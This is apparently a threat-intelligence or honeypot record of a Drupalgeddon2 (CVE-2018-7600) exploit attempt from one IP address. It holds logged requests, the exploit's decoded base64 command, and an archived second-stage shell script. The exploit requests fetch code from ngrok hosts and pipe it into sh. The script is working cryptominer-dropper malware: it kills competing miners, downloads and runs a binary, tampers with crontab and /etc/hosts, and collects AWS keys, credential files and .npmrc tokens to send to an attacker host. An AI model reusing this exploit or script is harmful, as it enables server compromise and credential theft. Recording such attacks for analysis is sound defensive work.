Drupalgeddon2 exploit attempt from 185.159.157.20

# Exploit attempt from 185.159.157.20 – Drupalgeddon2 (CVE-2018-7600)
Source IP   Country User Agent  Method  URI POST Data   FirstSeen   LastSeen
185.159.157.20  Switzerland Mozilla/5.0 (Linux; Android 6.0.1; Nexus 6P Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36   GET /CHANGELOG.txt  "-"   2019-05-23T20:29:38Z    2019-05-23T20:29:38Z
185.159.157.20  Switzerland Mozilla/5.0 (Linux; Android 6.0.1; Nexus 6P Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36   GET /core/034069b45cedfcd15e14a393488141a5.php?_cmd=echo+034069b45cedfcd15e14a393488141a5   "-"   2019-05-23T20:29:38Z    2019-05-23T20:29:38Z
185.159.157.20  Switzerland Mozilla/5.0 (Linux; Android 6.0.1; Nexus 6P Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36   GET /ps.php?c=echo+034069b45cedfcd15e14a393488141a5 "-"   2019-05-23T20:29:38Z    2019-05-23T20:29:38Z
185.159.157.20  Switzerland Mozilla/5.0 (Linux; Android 6.0.1; Nexus 6P Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36   GET /s.php?c=echo+034069b45cedfcd15e14a393488141a5  "-"   2019-05-23T20:29:38Z    2019-05-23T20:29:38Z
185.159.157.20  Switzerland Mozilla/5.0 (Linux; Android 6.0.1; Nexus 6P Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36   POST    /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo%20-n%20%27cGtpbGwgLTkgLWYgIlwuXC8uK1xzXC5cL3xuc3NtfGlwdGFibGVzfGJhc2h8c3lzbG9nfFwuY3JvbnxcIVwhfFxbXiI7Y3VybCAtbSA2MCAtc2sgJ2h0dHA6Ly9iYzNkYTI1NS5uZ3Jvay5pby9mL3NlcnZlP2w9dSZyPTAzNDA2OWI0NWNlZGZjZDE1ZTE0YTM5MzQ4ODE0MWE1JmN1cmw9MScgfCBzaA==%27%20|%20base64%20-d%20|%20sh    "form_id=user_pass&_triggering_element_name=name" 2019-05-23T20:29:38Z    2019-05-23T20:29:38Z
185.159.157.20  Switzerland Mozilla/5.0 (Linux; Android 6.0.1; Nexus 6P Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36   POST    /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo%20-n%20%27cGtpbGwgLTkgLWYgIlwuXC8uK1xzXC5cL3xuc3NtfGlwdGFibGVzfGJhc2h8c3lzbG9nfFwuY3JvbnxcIVwhfFxbXiI7d2dldCAtcSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlIC1PIC0gJ2h0dHA6Ly9iYzNkYTI1NS5uZ3Jvay5pby9mL3NlcnZlP2w9dSZyPTAzNDA2OWI0NWNlZGZjZDE1ZTE0YTM5MzQ4ODE0MWE1JndnZXQ9MScgfCBzaA==%27%20|%20base64%20-d%20|%20sh    "form_id=user_pass&_triggering_element_name=name" 2019-05-23T20:29:38Z    2019-05-23T20:29:38Z
185.159.157.20  Switzerland Mozilla/5.0 (Linux; Android 6.0.1; Nexus 6P Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36   GET /034069b45cedfcd15e14a393488141a5.php?_cmd=echo+034069b45cedfcd15e14a393488141a5    "-"   2019-05-23T20:29:37Z    2019-05-23T20:29:37Z
185.159.157.20  Switzerland Go-http-client/1.1  GET /   "-"   2019-05-23T20:10:09Z    2019-05-23T20:10:09Z


# Decoded Base64
"\.\/.+\s\.\/|nssm|iptables|bash|syslog|\.cron|\!\!|\[^";curl -m 60 -sk 'http://bc3da255.ngrok.io/f/serve?                      l=u&r=034069b45cedfcd15e14a393488141a5&curl=1' | sh

pkill -9 -f "\.\/.+\s\.\/|nssm|iptables|bash|syslog|\.cron|\!\!|\[^";wget -q --no-check-certificate -O -                'http://bc3da255.ngrok.io/f/serve?l=u&r=034069b45cedfcd15e14a393488141a5&wget=1' | sh

# Archive of payload URL: http://bc3da255.ngrok.io/f/serve?l=u&r=034069b45cedfcd15e14a393488141a5
export HOST="http://98934215.ngrok.io"
export RIP="034069b45cedfcd15e14a393488141a5"

reportinfo() {
  local _usr="$(whoami 2>/dev/null)"
  local _url="$HOST/m?o=$(pido)&r=${RIP}&t=${PROCS}&l=u&u=${_usr}"

  if type "wget" >/dev/null 2>&1 ; then
    wget -q "${_url}" >/dev/null 2>&1
  elif type "curl" >/dev/null 2>&1 ; then
    curl -sk "${_url}" >/dev/null 2>&1
  elif type "perl" >/dev/null 2>&1 ; then
    perl -e "use File::Fetch;my \$url = '${_url}'; my \$ff = File::Fetch->new(uri => \$url); my \$file = \$ff->fetch() or die ''; unlink(\$file)" >/dev/null 2>&1
  fi
}

finish () {
  excode=$?
  echo "OK"
  if [ $excode -eq 16 ]; then
    exit 0
  fi
  pcid=$(pido)
  if [ x"${pcid}" != x"" ]; then
    reportinfo
    if [ -s 78cd2f69da4c ]; then
      curl -sk -X POST -F file=@78cd2f69da4c -F r="$RIP" "$HOST/contact?k=1"
    fi
  else
    if type "curl" >/dev/null 2>&1 ; then
      curl -s -F file=@78cd2f69da4c "$HOST/contact?r=${RIP}&e=1" > /dev/null 2>&1
    elif type "wget" >/dev/null 2>&1 ; then
      tsh=$(wget --method PUT --body-file=78cd2f69da4c -O - -nv 2>/dev/null)
      wget --method POST "$HOST/contact?r=${RIP}&e=1&file=${tsh}" > /dev/null 2>&1
    fi
  fi
  rm -f 78cd2f69da4c
  exit $excode
}
trap finish EXIT

pido(){
  PIX=$(ps uxww|grep "034069b45cedfcd15e14a393488141a5b"|grep -v grep|grep -v defunct|grep -v serve|grep -v tmpfile|awk '{print $2, $1}'|head -n 1)
  PI=$(echo $PIX | awk '{print $1}')
  if [ x"${PI}" = x"$(whoami 2>/dev/null)" ]; then
    echo "${PIX}" | awk '{print $2}'
  else
    echo "${PI}"
  fi
}
killall() {
  ps uxww|grep "$RIP"|grep -v grep|grep -v tmpfile|grep -v defunct|grep -v serve|awk '{print $2}'|xargs -r kill -TTOU
  ps uxww|grep "$RIP"|grep -v grep|grep -v tmpfile|grep -v defunct|grep -v serve|awk '{print $2}'|xargs -r kill -9
}
killother() {
  ps uxww|grep "$RIP"|grep -v grep|grep -v tmpfile|grep -v defunct|grep -v serve|awk '{print $2}'|sed '$d'|xargs -r kill -TTOU
  ps uxww|grep "$RIP"|grep -v grep|grep -v tmpfile|grep -v defunct|grep -v serve|awk '{print $2}'|sed '$d'|xargs -r kill -9
}

INSTALL="/tmp/.sysinfo/"
mkdir -p $INSTALL

if [ ! -d "$INSTALL" ]; then
  INSTALL="$(pwd)/"
else
  chmod 770 $INSTALL
fi

cd $INSTALL

export LD_LIBRARY_PATH="$INSTALL:$LD_LIBRARY_PATH"
export PATH="$INSTALL:$PATH"


PROCS=$(expr $(grep -E "^processor" /proc/cpuinfo | wc -l) - 0)
if [ $PROCS -eq 0 ]; then
  PROCS=1
fi

  ps ux | grep -F '///'>/dev/null 2>&1
  if [ $? -eq 0 ]; then
    [ -f b2509b ] || curl -fks -o $INSTALL/b2509b "$HOST/d8/fc"
    chmod +x $INSTALL/b2509b
    ps ux | grep -F '///' | awk '{print $1}' | xargs -r -n1 kill -9>/dev/null 2>&1
    $INSTALL/b2509b '///' >>78cd2f69da4c 2>&1 &
  fi
  ps ux | grep -F '[^$I$^]'>/dev/null 2>&1
  if [ $? -eq 0 ]; then
    [ -f b2509b ] || curl -fks -o $INSTALL/b2509b "$HOST/d8/fc"
    chmod +x $INSTALL/b2509b
    ps ux | grep -F '[^$I$^]' | awk '{print $1}' | xargs -r -n1 kill -9>/dev/null 2>&1
    $INSTALL/b2509b '[^$I$^]' >>78cd2f69da4c 2>&1 &
  fi

pid=$(ps uxww|grep -v grep|grep -- '45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- '42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- '47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- '44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- '49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- '4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- 'Circle_MI'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- 'cryptonight'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- 'xmr.crypto-pool.fr'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- 'Circle_CF'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- '429MTSFoLS8E82yAepehvf1aG1Pt3Usz2DtSa28xekoKeVk1Yk8LKn24AQdtVNxBu73yS9VMxSxAaU1rkM4uZPczF9ozWXR'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- 'nm9LI'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- '/tmp/.httpd'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- '-c httpd.conf'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- '44WR4cmniSEXKknaKR5khKbA9dmdsL6oA1e7Jvkf8KEvYLvfSyWe6tF6PuLN81iAfTLBQovE9AT2icAezyxuH72iAQC8nQb'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- 'minexmr.com'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- 'Circle_AA'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- 'minergate'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- 'php refresh'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- 'tmp/.cron'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- '.resyslogd'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- 'xmr-stak'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi
pid=$(ps uxww|grep -v grep|grep -- 'sync_supers'|awk '{print $2}'); if [ x"${pid}" != x"" ]; then kill -9 $pid >/dev/null 2>&1; fi

reu() {
chattr -i $1 >/dev/null 2>&1
rm -rf $1 >/dev/null 2>&1
mkdir -p $1 > $1 2>/dev/null
}

if [ x"$(whoami 2>/dev/null)" = x"root" ]; then
reu /tmp/Circle_CF.png
reu /tmp/kcore
reu /tmp/BoomBoom
reu /usr/bin/ntpd
fi

app_md5_list="0c8eee301d16beefd56f56a30c58db7b 0e7ef4ac9c1d647479042f12401d1b3c cd4bf850a354a80eb860586d253a4385 ba27739dd60ee70d2bf8a068b35e4bb0"
ps uxww|sort -k3n|grep -v grep|grep -v COMMAND|tail -n 10|awk '{print $2,$11,$3,$6}' |
while IFS= read -r p_name; do
  p_pid=$(echo ${p_name}|awk '{print $1}')
  p_n=$(echo ${p_name}|awk '{print $2}')
  p_l=$(echo ${p_name}|awk '{print $3}')
  p_m=$(echo ${p_name}|awk '{print $4}')
  p_fp=$(ls -l /proc/${p_pid}/exe 2>/dev/null|awk '{print $NF}')

  if [ x"${p_n}" = x"034069b45cedfcd15e14a393488141a5b" ]; then continue; fi
  if [ x"${p_m}" = x"0" ]; then continue; fi
  if [ x"${p_fp}" != x"" ]; then
    if [ x"${p_fp}" = x"(deleted)"  ]; then
      kill -9 ${p_pid} > /dev/null 2>&1
    else
      p_l=${p_l%.*}
      p_md5=$(md5sum ${p_fp} 2>/dev/null|awk '{print $1}')
      [ $p_l -gt 20 ] && [ x"${p_md5}" != x"c5525a05e2eb3d2a54b0814e4cf48c4f" ] && echo "---appstore--- $p_name $p_md5 $p_fp" >> 78cd2f69da4c
      for md5 in ${app_md5_list}; do
        if [ x"${p_md5}" = x"${md5}" ]; then
          kill -9 ${p_pid} >/dev/null 2>&1
          chattr -i ${p_fp} >/dev/null 2>&1
          chmod -x ${p_fp} >/dev/null 2>&1
          echo '#!/bin/sh' > $p_fp 2>/dev/null
          chattr +i ${p_fp} >/dev/null 2>&1
        fi
      done
    fi
  fi
done

download() {
  chattr -i "${INSTALL}$2" >/dev/null 2>&1
  find "${INSTALL}$2" -exec chmod 770 {} + >/dev/null 2>&1
  chmod -R 770 "${INSTALL}$2">/dev/null 2>&1
  rm -rf "${INSTALL}$2">/dev/null 2>&1
  if type "curl" >/dev/null 2>&1 ; then
    curl -fks -o $2 $1
    return $?
  elif type "wget" >/dev/null 2>&1 ; then
    wget --timeout=60 -q $1 -O $2
    return $?
  elif type "perl" >/dev/null 2>&1 ; then
    perl -e "use File::Fetch;my \$url = '${1}'; my \$ff = File::Fetch->new(uri => \$url); my \$file = \$ff->fetch() or die "\$!"; system(\"mv \$file ${2}\")"
    return $?
  fi

  return 1
}

start() {
  chmod +x 034069b45cedfcd15e14a393488141a5b
  cat $INSTALL/9de5f7e707 | 034069b45cedfcd15e14a393488141a5b >/dev/null 2>&1 &
  sleep 1
  rm -rf 9de5f7e707
}

install() {
  killother
  pcid=$(pido)
  if [ x"${pcid}" != x"" ]; then
    return 0
  fi

  killall
  download "$HOST/d8/daemon" "034069b45cedfcd15e14a393488141a5b"
  download "$HOST/d8/nginx" "9de5f7e707"
  start
}

install

cat /etc/hosts | grep nanopool >/dev/null
if [ $? -eq 0 ]; then
  echo "127.0.0.1 localhost" > /etc/hosts
fi

if [ x"$(whoami 2>/dev/null)" != x"root" ]; then
  crontab -r >/dev/null 2>&1
else
  echo "" >78cd2f69da4c_cron

  crontab -l >/dev/null 2>&1
  if [ $? -eq 0 ]; then
    crontab -l | while IFS= read -r cron; do
      dl=$(echo "${cron}" | grep -E "(curl |wget |${RIP})")
      if [ x"${dl}" = x"" ]; then
        [ x"${cron}" != x"" ] && echo "${cron}" >>78cd2f69da4c_cron
      else
        echo "pomijam wpis $cron" >>78cd2f69da4c 2>&1
      fi
    done

    cat 78cd2f69da4c_cron | crontab - >>78cd2f69da4c 2>&1
    if [ $? -ne 0 ]; then
      crontab -r >/dev/null 2>&1
    fi
  fi
  rm -f 78cd2f69da4c_cron
fi

if type "curl" >/dev/null 2>&1 ; then
CFG="/tmp/.5dade2"
env | grep AWS>>$CFG;
find /home -maxdepth 5 -type f -name 'credentials' 2>/dev/null | xargs -I % sh -c 'echo :::%; cat %'>>$CFG 2>/dev/null
find /home -maxdepth 5 -type f -name '.npmrc' 2>/dev/null | xargs -I % sh -c 'echo :::%; cat %'>>$CFG 2>/dev/null
if [ -s $CFG ]; then
  curl -s -F file=@$CFG "$HOST/c?r=${RIP}" >/dev/null 2>&1
fi
rm -rf $CFG
fi


exit 0